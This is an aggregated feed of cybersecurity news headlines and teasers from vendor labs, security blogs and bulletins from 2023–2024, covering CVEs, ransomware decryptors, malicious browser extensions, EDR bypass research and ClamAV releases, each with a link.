Details on Apple's Shortcuts Vulnerability: A Deep Dive into CVE-2024-23204
CVE-2024-23204 [https://nvd.nist.gov/vuln/detail/CVE-2024-23204] sheds light on the critical importance of continuous security vigilance. Apple's Shortcuts application, designed to enhance user automation, can inadvertently become a potential vector for privacy breaches. This analysis aims to provide users, developers, and security professionals with insights into the nature of the vulnerability, its potential impact, and recommended mitigation measures. At a glance: * We have discovered a vul
https://www.bitdefender.com/blog/labs/details-on-apples-shortcuts-vulnerability-a-deep-dive-into-cve-2024-23204/

How to stay safe from repo-jacking
Repo-jacking is a specific type of supply chain attack. This blog post explains what it is, what the risk is, and what you can do to stay safe. The post How to stay safe from repo-jacking appeared first on The GitHub Blog.
https://github.blog/security/supply-chain-security/how-to-stay-safe-from-repo-jacking/

Decrypted: HomuWitch Ransomware
HomuWitch is a ransomware strain that initially emerged in July 2023. Unlike the majority of current ransomware strains, HomuWitch targets end-users - individuals - rather than institutions and companies. The post Decrypted: HomuWitch Ransomware appeared first on Avast Threat Labs.
https://decoded.avast.io/threatresearch/decrypted-homuwitch-ransomware/?utm_source=rss&utm_medium=rss&utm_campaign=decrypted-homuwitch-ransomware

Sensor Intel Series: Top CVEs in January 2024
More IoT Targeting, plus a bunch of new CVEs! See what attackers went after in January 2024.
https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-january-2024

Audio deepfakes: Celebrity-endorsed giveaway scams and fraudulent investment opportunities flood social media platforms
Bitdefender Labs has been keeping up with the latest modus operandi of cybercrooks who adapt emerging technologies to siphon money from consumers. Artificial intelligence is just one of the many tools that help in the creation and successful dissemination of online schemes to extort money and sensitive information. This paper focuses on voice cloning (audio deepfakes) schemes and how they are proliferated via social media to trick unsuspecting victims. Before delving deeper into the main subj
https://www.bitdefender.com/blog/labs/audio-deepfakes-celebrity-endorsed-giveaway-scams-and-fraudulent-investment-opportunities-flood-social-media-platforms/

NIST Celebrates National Entrepreneurship Week
What is National Entrepreneurship (NatlEshipWeek) Week? Celebrated February 10-17, 2024, “NatlEshipWeek is a congressionally chartered week dedicated to empowering entrepreneurship across the United States. The annual initiative was relaunched in 2017 as NatlEshipWeek to bring together a network of partners from Maui to Miami to educate, engage, and build equitable access to America's Entrepreneurship Ecosystem.” Follow along online with #NatlEshipWeek. You can learn more about the initiative here: https://www.natleshipweek.org/about . Supporting Entrepreneurship is at the Heart of NIST's
https://www.nist.gov/blogs/cybersecurity-insights/nist-celebrates-national-entrepreneurship-week

Decrypted: Rhysida Ransomware
The team at Avast has developed a decryptor for the Rhysida ransomware and released it for public download. The Rhysida ransomware has been active since May 2023. As of Feb 2024, their TOR site lists 78 attacked companies, including the IT (Information Technology) sector, healthcare, universities, and government organizations. The post Decrypted: Rhysida Ransomware appeared first on Avast Threat Labs.
https://decoded.avast.io/threatresearch/decrypted-rhysida-ransomware/?utm_source=rss&utm_medium=rss&utm_campaign=decrypted-rhysida-ransomware

Bypassing EDRs With EDR-Preloading
Evading user mode EDR hooks by hijacking the AppVerifier layer
https://malwaretech.com/2024/02/bypassing-edrs-with-edr-preload.html

Azure Site Recovery privilege escalation
When the ASR service is enabled, it uses an Automation Account with a System-Assigned Managed Identity to manage Site Recovery extensions on VMs. However, the Runbook (a set of scripts for managing extensions) executed by the Automation Account had its job output visible to users, and this output mistakenly included a cleartext Management-scoped Access Token for the System-Assigned Managed Identity, which possesses the Contributor role over the entire Azure subscription. Therefore, lower-privileged user roles who could access the Automation Account's job output could see and use this Access Token. This access allowed these users to impersonate the Managed Identity, thereby elevating their privileges to that of a Contributor for the whole subscription, including the ability to execute commands...
https://www.cloudvulndb.org/azure-site-recovery-pe

New macOS Backdoor Written in Rust Shows Possible Link with Windows Ransomware Group
UPDATE: Following our initial release, we have been contacted by our fellow researchers at Jamf who were able to identify three more samples that act like first-stage payloads. They are responsible for downloading the backdoor: * e7cab6f2be47940bf36e279bbec54ec7 - Jobinfo.app.zip * 26d6a7e3507edf9953684d367dcd44bd - Jobinfo.zip * 775851f86cbde630808ff6d2cf8cedbf - Jobinfo.zip Combined with information in our previous research, the investigation of these samples revealed new components of t
https://www.bitdefender.com/blog/labs/new-macos-backdoor-written-in-rust-shows-possible-link-with-windows-ransomware-group/

ClamAV 1.3.0 feature release and 1.2.2, 1.0.5 security patch release!
The ClamAV 1.3.0 feature release is now stable! Today, we are also publishing the 1.2.2 and 1.0.5 security patch versions. ClamAV 1.1 is past EOL for security fixes and will not receive an update. Switch to the 1.0 LTS, 1.2, or 1.3 versions for continued support. The release files are available for download on the ClamAV downloads page, on the GitHub Release page, and through Docker Hub*: Alpine-based images; Debian-based multi-arch images. *The Docker images are built on release day and may not be available until later in the day. Continue reading to learn what changed in each version. 1.3.0: ClamAV 1.3.0 includes the following improvements and changes. Major changes: Added support for extracting and scanning attachments found in Microsoft OneNote section files. OneNote parsing will be enabled by default,...
http://blog.clamav.net/2023/11/clamav-130-122-105-released.html

Avast Q4/2023 Threat Report
10 Billion Attacks Blocked in 2023, Qakbot's Resurrection, and Google API Abused The post Avast Q4/2023 Threat Report appeared first on Avast Threat Labs.
https://decoded.avast.io/threatresearch/avast-q4-2023-threat-report/?utm_source=rss&utm_medium=rss&utm_campaign=avast-q4-2023-threat-report

AppSec is harder than you think. Here's how AI can help.
In practice, shifting left has been more about shifting the burden rather than the ability. But AI is bringing its promise closer to reality. Here's how. The post AppSec is harder than you think. Here's how AI can help. appeared first on The GitHub Blog.
https://github.blog/security/application-security/appsec-is-harder-than-you-think-heres-how-ai-can-help/

Azure HDInsight privilege escalation and DoS vulnerabilities
Three privilege escalation and denial-of-service vulnerabilities were discovered in Azure HDInsight, related to its usage of Apache Oozie and Ambari. The root cause of at least one of these vulnerabilities is a flaw in Apache Oozie itself, leading to regex denial-of-service (ReDoS). The other two vulnerabilities could allow an authenticated attacker with HDI cluster access to gain cluster administrator privileges and perform any resource service management operation. The vulnerabilities were patched in the October 2023 security update of Azure HDInsight.
https://www.cloudvulndb.org/azure-hdinsight-dos

Bots Cheat to Win
How automated fraudsters tried to ruin a restaurant's promotional contest.
https://www.f5.com/labs/articles/threat-intelligence/bots-cheat-to-win

CVE-2024-21626 - Runc container issue
Publication Date: 2024/01/31 1:30 PM PST CVE Identifier: CVE-2024-21626 AWS is aware of a recently disclosed security issue affecting the runc component of several open source container management systems (CVE-2024-21626). With the exception of the AWS services listed below, no customer action is required to address this issue. Amazon Linux An updated version of runc is available for Amazon Linux 1 (runc-1.1.11-1.0.amzn1), Amazon Linux 2 (runc-1.1.11-1.amzn2) and for Amazon Linux 2023 (runc-1.1.11-1.amzn2023). AWS recommends that customers using runc or other container-related software apply those updates or a newer version. Further information is available in the Amazon Linux Security Center. Bottlerocket OS An updated version of runc will be included in Bottlerocket 1.19.0, which will...
https://aws.amazon.com/security/security-bulletins/AWS-2024-001/

Azure Devops Zero-Click CI/CD Vulnerability
Legit Security found a zero-click vulnerability in Azure Pipelines that allows an attacker to access secrets and internal information and perform actions with elevated permissions in the context of a pipeline workflow. This could allow attackers to move laterally in the organization and initiate supply chain attacks. When a pipeline is triggered by a "pipeline resource trigger," it shows in the platform as "Automatically Triggered For …". Instead of running with fork default permissions, which prevent any access to secrets and sensitive actions, Azure Pipelines "confuses" the trigger for an internal build, allowing access to sensitive build secrets. Exploitability depends on a public GitHub repository that runs Azure pipelines on pull-request, with default Azure pipeline fork configurations to trigger...
https://www.cloudvulndb.org/azure-devops-zero-click

Do you know if all your repositories have up-to-date dependencies?
Consider deploying the GitHub Action Evergreen so that you know each of your repositories is leveraging active dependency management with Dependabot. The post Do you know if all your repositories have up-to-date dependencies? appeared first on The GitHub Blog.
https://github.blog/security/supply-chain-security/do-you-know-if-all-your-repositories-have-up-to-date-dependencies/

Investigating Worldwide SMS Scams, and Tens of Millions of Dollars in Fraud
SMS services remain a critical part of telecommunications; they don't require Internet access, and companies use them to inform their customers. This combination of features makes them incredibly useful for criminals who use the technology as a stepping stone in their never-ending campaigns. And if you think that the new RCS messaging standard [https://en.wikipedia.org/wiki/Rich_Communication_Services] will offer any protection, you would be wrong. These types of scams will continue to spread re
https://www.bitdefender.com/blog/labs/investigating-worldwide-sms-scams-and-tens-of-millions-of-dollars-in-fraud/

ClamAV 1.3.0 Second Release Candidate now available!
We are excited to announce the ClamAV 1.3.0 release candidate. You can find the source code and installers for this release on the clamav.net/downloads page or the ClamAV GitHub release page. Tip: If you are downloading the source from the GitHub release page, the package labeled "clamav-1.3.0-rc2.tar.gz" does not require an internet connection to build. All dependencies are included in this package. But if you download the ZIP or TAR.GZ generated by GitHub, located at the very bottom, then an internet connection will be required during the build to download additional Rust dependencies. For Docker users, there is no specific Docker tag for the release candidate, but you can use these tags: clamav/clamav:unstable, clamav/clamav:unstable_base, clamav/clamav-debian:unstable, clamav/clamav-debian:unstable_base. This...
http://blog.clamav.net/2024/01/clamav-130-second-release-candidate-now.html

Sensor Intel Series: Top CVEs in December 2023
We add 6 CVEs to our list and do a brief roundup of some stats from 2023.
https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-december-2023

ClamAV Debian multi-Arch Docker images now available!
We now offer official ClamAV docker images based on `debian:11-slim`. In addition to offering an alternative to the original Alpine Linux images, the new images are multi-arch images supporting `linux/amd64`, `linux/arm64`, and `linux/ppc64le`. ClamAV's Alpine-based and Debian-based Docker images are now built weekly to pick up security fixes in the base images. Check it out here.
http://blog.clamav.net/2024/01/clamav-debian-multi-arch-docker-images.html

Stream-Jacking 2.0: Deep fakes power account takeovers on YouTube to maximize crypto-doubling scams
As of October 2023, researchers at Bitdefender Labs have been actively keeping tabs [https://www.bitdefender.com/blog/labs/a-deep-dive-into-stream-jacking-attacks-on-youtube-and-why-theyre-so-popular/] on stream-jacking attacks against high-profile YouTube accounts used to conduct a myriad of crypto doubling scams. Fast forward to 2024; our investigation into the fraudulent takeovers and usage of YouTube accounts has rendered new findings, as financially motivated threat actors meticulously evo
https://www.bitdefender.com/blog/labs/stream-jacking-2-0-deep-fakes-power-account-takeovers-on-youtube-to-maximize-crypto-doubling-scams/

How to Recover an Unsaved Excel File
If your Excel file was left unsaved by accident, don’t fret – Microsoft understands mistakes happen and provides built-in functionality to help recover it. To recover an unsaved file, navigate... The post How to Recover an Unsaved Excel File appeared first on Hacker Combat.
https://www.hackercombat.com/how-to-recover-unsaved-excel-file/

How to See Who Blocked You on Facebook
If you suspect someone has blocked you on Facebook, various methods exist to investigate their actions. One option would be searching for their name; they may have blocked you if... The post How to See Who Blocked You on Facebook appeared first on Hacker Combat.
https://www.hackercombat.com/how-to-see-who-blocked-you-on-facebook/

How To Access Your Photos On iCloud
iCloud can be an easy and secure way to back up photos and videos, but accessing those files across devices may prove challenging. Thank goodness there are multiple ways to... The post How To Access Your Photos On iCloud appeared first on Hacker Combat.
https://www.hackercombat.com/how-to-access-your-photos-on-icloud/

Why is the iPhone Force Restart Not Working?
If the iPhone force restart does not work as intended, there may be an issue with the iOS system. To address this, look for physical damage to buttons used for... The post Why is the iPhone Force Restart Not Working? appeared first on Hacker Combat.
https://www.hackercombat.com/iphone-force-restart-not-working/

YouTube Not Working on iPhone? Here's How to Fix It
If the YouTube app on your iPhone is crashing or will not open, there are various fixes you can try, such as force quitting the app, rebooting your device, and... The post YouTube Not Working on iPhone? Here’s How to Fix It appeared first on Hacker Combat.
https://www.hackercombat.com/youtube-not-working-on-iphone/

Avast Updates Babuk Ransomware Decryptor in Cooperation with Cisco Talos and Dutch Police
In cooperation with Cisco Talos and Dutch Police, Avast is releasing an updated version of the Avast Babuk decryption tool, capable of restoring files encrypted by the Babuk variant called Tortilla. The post Avast Updates Babuk Ransomware Decryptor in Cooperation with Cisco Talos and Dutch Police appeared first on Avast Threat Labs.
https://decoded.avast.io/threatresearch/avast-updates-babuk-ransomware-decryptor-in-cooperation-with-cisco-talos-and-dutch-police/?utm_source=rss&utm_medium=rss&utm_campaign=avast-updates-babuk-ransomware-decryptor-in-cooperation-with-cisco-talos-and-dutch-police

GitHub and the Ekoparty 2023 Capture the Flag
The GitHub Security Lab teamed up with Ekoparty once again to create some challenges for its yearly Capture the Flag competition! The post GitHub and the Ekoparty 2023 Capture the Flag appeared first on The GitHub Blog.
https://github.blog/security/application-security/github-and-the-ekoparty-2023-capture-the-flag/

Best EDR Of The Market (BEOTM) – Endpoint Detection and Response Testing Tool
BestEDROfTheMarket is a naive user-mode EDR (Endpoint Detection and Response) tool designed to serve as a testing ground
https://www.darknet.org.uk/2024/01/best-edr-of-the-market-beotm-endpoint-detection-and-response-testing-tool/

Silly EDR Bypasses and Where To Find Them
Abusing exception handlers to hook and bypass user mode EDR hooks.
https://malwaretech.com/2023/12/silly-edr-bypasses-and-where-to-find-them.html

An Introduction to Bypassing User Mode EDR Hooks
Understanding the basics of user mode EDR hooking, common bypass techniques, and their limitations.
https://malwaretech.com/2023/12/an-introduction-to-bypassing-user-mode-edr-hooks.html

How to Temporarily Deactivate Instagram?
Instagram is an amazing social platform where you can stay in touch with your friends and influencers, but sometimes it can be too much. Taking a break may help. Instagram... The post How to Temporarily Deactivate Instagram? appeared first on Hacker Combat.
https://www.hackercombat.com/how-to-temporarily-deactivate-instagram/

How To Delete Facebook Business Page?
An inactive Facebook business page won’t do your brand any good; sometimes, it may be best to delete it and start fresh. Deleting a page is straightforward and can be... The post How To Delete Facebook Business Page? appeared first on Hacker Combat.
https://www.hackercombat.com/how-to-delete-facebook-business-page/

Do AirPods Work With Android?
AirPods work well with Android, but the experience may be less satisfying or convenient compared to Apple’s ecosystem. Certain features are unavailable such as customizing double-tap functionality and access to... The post Do AirPods Work With Android? appeared first on Hacker Combat.
https://www.hackercombat.com/do-airpods-work-with-android/

How to Know If Someone Screengrabs Your Instagram Story
Instagram doesn’t inform its users when their Story or Reel has been screengrabbed – no matter whether they have millions of followers or just an everyday account – which means... The post How to Know If Someone Screengrabs Your Instagram Story appeared first on Hacker Combat.
https://www.hackercombat.com/how-to-know-if-someone-screengrabs-your-instagram-story/

How To Scan a QR Code On iPhone
The iPhone offers multiple ways of scanning QR codes, but the quickest and easiest method is using its built-in camera app. Open your camera app and point at a QR... The post How To Scan a QR Code On iPhone appeared first on Hacker Combat.
https://www.hackercombat.com/how-to-scan-a-qr-code-on-iphone/

ClamAV 1.3.0 release candidate now available!
The ClamAV 1.3.0 release candidate is now available. You may find the source code and installers for this release on the clamav.net/downloads page or the ClamAV GitHub release page. Tip: If you are downloading the source from the GitHub release page, the package labeled "clamav-1.3.0-rc.tar.gz" does not require an internet connection to build. All dependencies are included in this package. But if you download the ZIP or TAR.GZ generated by GitHub, located at the very bottom, then an internet connection will be required during the build to download additional Rust dependencies. For Docker users, there is no specific Docker tag for the release candidate, but you can use the clamav:unstable or clamav:unstable_base tags. The release candidate phase is expected...
http://blog.clamav.net/2023/12/clamav-130-release-candidate-now.html

Scaling vulnerability management across thousands of services and more than 150 million findings
Learn about how we run a scalable vulnerability management program built on top of GitHub. The post Scaling vulnerability management across thousands of services and more than 150 million findings appeared first on The GitHub Blog.
https://github.blog/security/application-security/scaling-vulnerability-management-across-thousands-of-services-and-more-than-150-million-findings/

First handset with MTE on the market
https://googleprojectzero.blogspot.com/2023/11/first-handset-with-mte-on-market.html

ClamAV 1.2.1, 1.1.3, 1.0.4, 0.103.11 patch versions published
Today, we are publishing the 1.2.1, 1.1.3, 1.0.4, and 0.103.11 security patch versions. The release files for the patch versions are available for download on the ClamAV downloads page, on the GitHub Release page, and through Docker Hub. Continue reading to learn what changed in each version. 1.2.1: ClamAV 1.2.1 is a patch release with the following fixes: Eliminate security warning about unused "atty" dependency (GitHub pull request). Upgrade the bundled UnRAR library (libclamunrar) to version 6.2.12 (GitHub pull request). Build system: Fix link error with Clang/LLVM/LLD version 17. Patch courtesy of Yasuhiro Kimura (GitHub pull request). Fix alert-exceeds-max feature for files > 2GB and < max-filesize (GitHub pull request). Special thanks to Yasuhiro Kimura for code contributions and bug reports. 1.1.3: ClamAV...
http://blog.clamav.net/2023/10/clamav-121-113-104-010311-patch.html

Implementing a “Share on Mastodon” button for a blog
I decided that I would make it easier for people to share my articles on social media, most importantly on Mastodon. However, my Hugo theme didn't support showing a “Share on Mastodon” button yet. It wasn't entirely trivial to add support either: unlike with centralized solutions like Facebook where a simple link is sufficient, here one would need to choose their home instance first. As far as existing solutions go, the only reasonably sophisticated approach appears to be Share₂Fedi. It works nicely, privacy-wise one could do better however. So I ended up implementing my own solution while also generalizing that solution to support a variety of different Fediverse applications in addition to Mastodon. Contents Why not Share₂Fedi? Share on Mastodon or on Fediverse? ...
https://palant.info/2023/10/19/implementing-a-share-on-mastodon-button-for-a-blog/

An analysis of an in-the-wild iOS Safari WebContent to GPU Process exploit
https://googleprojectzero.blogspot.com/2023/10/an-analysis-of-an-in-the-wild-ios-safari-sandbox-escape.html

It might Be Time to Rethink Phishing Awareness
Phishing awareness can be a powerful security tool, or a complete disaster. It all hinges on how you implement it.
https://malwaretech.com/2023/09/it-might-be-time-to-rethink-phishing-awareness.html

Analyzing a Modern In-the-wild Android Exploit
By Seth Jenkins, Project Zero. Introduction: In December 2022, Google's Threat Analysis Group (TAG) discovered an in-the-wild exploit chain targeting Samsung Android devices. TAG's blog post covers the targeting and the actor behind the campaign. This is a technical analysis of the final stage of one of the exploit chains, specifically CVE-2023-0266 (a 0-day in the ALSA compatibility layer) and CVE-2023-26083 (a 0-day in the Mali GPU driver), as well as the techniques used by the attacker to gain kernel arbitrary read/write access. Notably, several of the previous stages of the exploit chain used n-day vulnerabilities: CVE-2022-4262, a 0-day vulnerability in Chrome, was exploited in the Samsung browser to achieve RCE. CVE-2022-3038, a Chrome n-day that was unpatched in the Samsung browser, was used...
https://googleprojectzero.blogspot.com/2023/09/analyzing-modern-in-wild-android-exploit.html

A year after the disastrous breach, LastPass has not improved
In September last year, a breach at LastPass' parent company GoTo (formerly LogMeIn) culminated in attackers siphoning out all data from their servers. The criticism from the security community has been massive. This was not so much because of the breach itself, such things happen, but because of the many obvious ways in which LastPass made matters worse: taking months to notify users, failing to provide useful mitigation instructions, downplaying the severity of the attack, ignoring technical issues which have been publicized years ago and made the attackers' job much easier. The list goes on. Now this has been almost a year ago. LastPass promised to improve, both as far as their communication goes and on the technical side of things. So let's take a look at whether they managed to...
https://palant.info/2023/09/05/a-year-after-the-disastrous-breach-lastpass-has-not-improved/

AgentSmith HIDS – Host Based Intrusion Detection
AgentSmith HIDS is a powerful component of a host-based intrusion detection system. It has anti-rootkit functionality and is a very performant way to collect information about a host.
https://www.darknet.org.uk/2023/08/agentsmith-hids-host-based-intrusion-detection/

Chrome Sync privacy is still very bad
Five years ago I wrote an article about the shortcomings of Chrome Sync (as well as a minor issue with Firefox Sync). Now Chrome Sync has seen many improvements since then. So the time seems right for me to revisit it and to see whether it respects your privacy now. Spoiler: No, it doesn't. It improved, but that's an improvement from outright horrible to merely very bad. The good news: today you can use Chrome Sync in a way that preserves your privacy. Google however isn't interested in helping you figure out how to do it. Contents: The default flow; The privacy-preserving flow; What does Google do with your data?; It could have been worse; Comparison to Firefox Sync. The default flow: Chrome Sync isn't some obscure feature of Google Chrome. In fact, as of Chrome...
https://palant.info/2023/08/29/chrome-sync-privacy-is-still-very-bad/

ClamAV 1.2.0 feature version and 1.1.2, 1.0.3, 0.103.10 patch versions published
The ClamAV 1.2.0 feature release is now stable and available for download on the ClamAV downloads page, on the Github Release page, and through Docker Hub. Today, we are also publishing the 1.1.2, 1.0.3, and 0.103.10 security patch versions. You may be surprised about the impromptu patch release. Indeed, we just published patch versions earlier this month. Unfortunately, a recent CVE for the UnRAR* library has prompted us to prepare these additional updates. We strongly encourage everyone to upgrade to one of these versions. The release files for the patch versions are also available for download on the ClamAV downloads page, on the Github Release page, and through Docker Hub. Because ClamAV 1.2.0 is now the latest release, the release files for version 1.1.2 will be found under the...
http://blog.clamav.net/2023/08/clamav-120-feature-version-and-111-102.html

ClamAV 1.1.1, 1.0.2, 0.103.9 patch versions published
Today, we are releasing the following critical patch versions for ClamAV: 1.1.1, 1.0.2, 0.103.9. ClamAV 0.105 and 0.104 have reached end-of-life according to ClamAV's End of Life (EOL) policy and will not be patched. The release files are available for download on ClamAV.net, on the Github Release page, and through Docker Hub. Note: We observed an issue building ClamAV on Windows using the recently released libjson-c version 0.17. If you are building ClamAV for Windows, you should use libjson-c version 0.16 or prior. 1.1.1: ClamAV 1.1.1 is a critical patch release with the following fixes: CVE-2023-20197: Fixed a possible denial of service vulnerability in the HFS+ file parser. This issue affects versions 1.1.0, 1.0.1 through 1.0.0, 0.105.2 through 0.105.0,...
http://blog.clamav.net/2023/07/2023-08-16-releases.html

H1 2023 Bad Bots Review
Bot traffic for the first half of 2023 was fairly typical, some rapid change in a few industries notwithstanding. Learn who got hit hard and who got off easy.
https://www.f5.com/labs/articles/threat-intelligence/monthly-bot-stats-report-h1-2023

ClamAV 1.2.0 release candidate now available
We are excited to announce the ClamAV 1.2.0 release candidate. You may find the source code and installers for this release on the clamav.net/downloads page or the ClamAV GitHub release page. Tip: If you are downloading the source from the GitHub release page, the package labeled "clamav-1.2.0-rc.tar.gz" does not require an internet connection to build. All dependencies are included in this package. But if you download the ZIP or TAR.GZ generated by GitHub, located at the very bottom, then an internet connection will be required during the build to download additional Rust dependencies. For Docker users, there is no specific Docker tag for the release candidate, but you can use the clamav:unstable or clamav:unstable_base tags. The release candidate phase...
http://blog.clamav.net/2023/08/clamav-120-release-candidate-now.html

MTE As Implemented, Part 1: Implementation Testing
https://googleprojectzero.blogspot.com/2023/08/mte-as-implemented-part-1.html

MTE As Implemented, Part 3: The Kernel
https://googleprojectzero.blogspot.com/2023/08/mte-as-implemented-part-3-kernel.html

MTE As Implemented, Part 2: Mitigation Case Studies
https://googleprojectzero.blogspot.com/2023/08/mte-as-implemented-part-2-mitigation.html

Summary: MTE As Implemented
https://googleprojectzero.blogspot.com/2023/08/summary-mte-as-implemented.html

Why browser extension games need access to all websites
When installing browser extensions in Google Chrome, you are asked to confirm the extension's permissions. In theory, this is supposed to allow assessing the risk associated with an extension. In reality however, users typically lack the knowledge to properly interpret this prompt. For example, I've often seen users accusing extension developers of spying just because the prompt says they could. On the other hand, people will often accept these cryptic prompts without thinking twice. They expect the browser vendors to keep them out of harm's way, a trust that isn't always justified [1] [2] [3]. The most extreme scenario here is casual games not interacting with the web at all, yet requesting access to all websites. I found a number of extensions that will abuse this power to hijack...
https://palant.info/2023/06/14/why-browser-extension-games-need-access-to-all-websites/

Shutting down old ClamAV Bugzilla
ClamAV will shut down the old ClamAV Bugzilla server in July. Users who have any outstanding Bugzilla reports should move them to GitHub Issues as soon as possible. We disabled new tickets in Bugzilla in December 2021 in favor of GitHub Issues for all new ClamAV bug reports and a new process for reporting vulnerabilities as defined by a new security policy. As it has now been 18 months since the switch to GitHub Issues, we have decided to shut down our old Bugzilla. We plan to take the Bugzilla server off the internet sometime after July 1 and keep it as an internal reference for our development team. It will no longer be accessible to the public.
http://blog.clamav.net/2023/06/shutting-down-old-clamav-bugzilla.html

Another cluster of potentially malicious Chrome extensions
We've already seen Chrome extensions containing obfuscated malicious code. We've also seen PCVARK's malicious ad blockers. When looking for more PCVARK extensions, I stumbled upon an inconspicuous extension called “Translator - Select to Translate.” The only unusual thing about it were its reviews, lots of raving positive reviews mixed with usability complaints. That, and the permissions: why does a translator extension need webRequest and webRequestBlocking permissions? When I looked into this extension, I immediately discovered a strange code block. Supposedly, it was buggy locale processing. In reality, it turned out to be obfuscated malicious logic meant to perform affiliate fraud. That extension wasn't alone. I kept finding similar extensions until I had a list of 109 extensions,...
https://palant.info/2023/06/08/another-cluster-of-potentially-malicious-chrome-extensions/

Introducing PCVARK and their malicious ad blockers
It isn't news that the overwhelming majority of ad blockers in Chrome Web Store are either outright malicious or waiting to accumulate users before turning malicious. So it wasn't a surprise that the very first ad blocker I chose semi-randomly (Adblock Web with 700,000 users) turned out malicious. Starting from it, I found another malicious extension (Ad-Blocker, 700,000 users) and two more that were removed from Chrome Web Store a year ago (BitSafe Adblocker and Adblocker Unlimited). All these ad blockers and probably some more were developed by the company PCVARK. According to Malwarebytes Labs, this company specializes in developing “potentially unwanted programs.” In other words: they show users warnings about alleged compromise, only to push them into installing their software....
https://palant.info/2023/06/05/introducing-pcvark-and-their-malicious-ad-blockers/

How malicious extensions hide running arbitrary code
Two days ago I wrote about the malicious extensions I discovered in Chrome Web Store. At some point this article got noticed by Avast. Once their team confirmed my findings, Google finally reacted and started removing these extensions. Out of the 34 extensions I reported, only 8 extensions remain. These eight were all part of an update where I added 16 extensions to my list, an update that came too late for Avast to notice. Note: Even for the removed extensions, it isn't “mission accomplished” yet. Yes, the extensions can no longer be installed. However, the existing installations remain. From what I can tell, Google didn't blocklist these extensions yet. Avast ran their own search, and they found a bunch of extensions that I didn't see. So how come they missed eight extensions?...
https://palant.info/2023/06/02/how-malicious-extensions-hide-running-arbitrary-code/

More malicious extensions in Chrome Web Store
Two weeks ago I wrote about the PDF Toolbox extension containing obfuscated malicious code. Despite reporting the issue to Google via two different channels, the extension remains online. It even gained a considerable number of users after I published my article. A reader tipped me off however that the Zoom Plus extension also makes a request to serasearchtop[.]com. I checked it out and found two other versions of the same malicious code. And I found more extensions in Chrome Web Store which are using it. So now we are at 18 malicious extensions with a combined user count of 55 million. The most popular of these extensions are Autoskip for Youtube, Crystal Ad block and Brisk VPN: nine, six and five million users respectively. Update (2023-06-01): With an increased sample I was able to find...
https://palant.info/2023/05/31/more-malicious-extensions-in-chrome-web-store/

padre – Padding Oracle Attack Exploiter Tool
padre is an advanced exploiter and Padding Oracle attack tool that can be deployed against CBC mode encryption.
https://www.darknet.org.uk/2023/05/padre-padding-oracle-attack-exploiter-tool/

End of life (EOL) policy change, 0.103 one year extension, 0.105 past end of life
End of life (EOL) policy change: ClamAV is making a minor change to our EOL policy. The original EOL policy stated that Long Term Support (LTS) versions will lose access to signature updates on the same date that we end support for additional patch versions. We are changing the policy to allow signature updates for at least one year after we stop supporting the release with patch versions. 0.103 support extension: We are also announcing a one-year extension of support for ClamAV 0.103 LTS. We decided to extend the life of the 0.103 LTS release because of the significant changes to the build system in 0.104 and the change in 0.105 requiring the Rust programming language toolchain to compile ClamAV. The one-year support extension does not apply to future LTS...
http://blog.clamav.net/2023/05/end-of-life-eol-policy-change-0103-one.html

Issue With IAM Supporting Multiple MFA Devices
Initial Publication Date: 04/25/2023 10:00AM EST. A security researcher recently reported an issue with AWS's recently-released (November 16th, 2022) support for multiple multi-factor authentication (MFA) devices for IAM user principals. The reported issue could have potentially arisen only when the following three conditions were met: (1) An IAM user had possession of long-term access key (AK)/secret key (SK) credentials, (2) that IAM user had the privilege to add an MFA to their own identity without using an MFA, and (3) that IAM user's overall access privileges beyond console sign-in had been configured by an administrator to be greater after adding the MFA. Under those narrow conditions, possession of AK/SK alone was equivalent to possession of AK/SK and a previously configured MFA....
https://aws.amazon.com/security/security-bulletins/AWS-2023-001/

Privacy Implications of Web 3.0 and Darknets
The evolution of the internet has been rapid over the years and has shaped the privacy implications of Web 3.0 and darknets.
https://www.darknet.org.uk/2023/03/privacy-implications-of-web-3-0-and-darknets/

DataSurgeon – Extract Sensitive Information (PII) From Logs
DataSurgeon (ds) is a versatile tool designed to extract sensitive information (PII) from logs. It is intended to be used for incident response, penetration testing, and CTF challenges.
https://www.darknet.org.uk/2023/03/datasurgeon-extract-sensitive-information-pii-from-logs/

We're going teetotal: It's goodbye to The Daily Swig
PortSwigger today announces that The Daily Swig is closing down
https://portswigger.net/daily-swig/were-going-teetotal-its-goodbye-to-the-daily-swig

Bug Bounty Radar // The latest bug bounty programs for March 2023
New web targets for the discerning hacker
https://portswigger.net/daily-swig/bug-bounty-radar-the-latest-bug-bounty-programs-for-march-2023

Indian transport ministry flaws potentially allowed creation of counterfeit driving licenses
Armed with personal data fragments, a researcher could also access 185 million citizens' PII
https://portswigger.net/daily-swig/indian-transport-ministry-flaws-potentially-allowed-creation-of-counterfeit-driving-licenses

Password managers: A rough guide to enterprise secret platforms
The second part of our password manager series looks at business-grade tech to handle API tokens, login credentials, and more
https://portswigger.net/daily-swig/password-managers-a-rough-guide-to-enterprise-secret-platforms

Chromium bug allowed SameSite cookie bypass on Android devices
Protections against cross-site request forgery could be bypassed
https://portswigger.net/daily-swig/chromium-bug-allowed-samesite-cookie-bypass-on-android-devices

Deserialized web security roundup: Twitter 2FA backlash, GoDaddy suffers years-long attack campaign, and XSS Hunter adds e2e encryption
Your fortnightly rundown of AppSec vulnerabilities, new hacking techniques, and other cybersecurity news
https://portswigger.net/daily-swig/deserialized-web-security-roundup-twitter-2fa-backlash-godaddy-suffers-years-long-attack-campaign-and-xss-hunter-adds-e2e-encryption

NIST plots biggest ever reform of Cybersecurity Framework
CSF 2.0 blueprint offered up for public review
https://portswigger.net/daily-swig/nist-plots-biggest-ever-reform-of-cybersecurity-framework

Cisco ClamAV anti-malware scanner vulnerable to serious security flaw
Patch released for bug that poses a critical risk to vulnerable technologies
https://portswigger.net/daily-swig/cisco-clamav-anti-malware-scanner-vulnerable-to-serious-security-flaw

CVSS system criticized for failure to address real-world impact
JFrog argues vulnerability risk metrics need complete revamp
https://portswigger.net/daily-swig/cvss-system-criticized-for-failure-to-address-real-world-impact

A Realistic Look at Implications of ChatGPT for Cybercrime
Analyzing ChatGPT's capabilities and various claims about how it will revolutionize cybercrime.
https://malwaretech.com/2023/02/a-realistic-look-at-chatgpt-cybercrime.html

‘Most web API flaws are missed by standard security tests' – Corey J Ball on securing a neglected attack vector
API security is a ‘great gateway' into a pen testing career, advises specialist in the field
https://portswigger.net/daily-swig/most-web-api-flaws-are-missed-by-standard-security-tests-corey-j-ball-on-securing-a-neglected-attack-vector

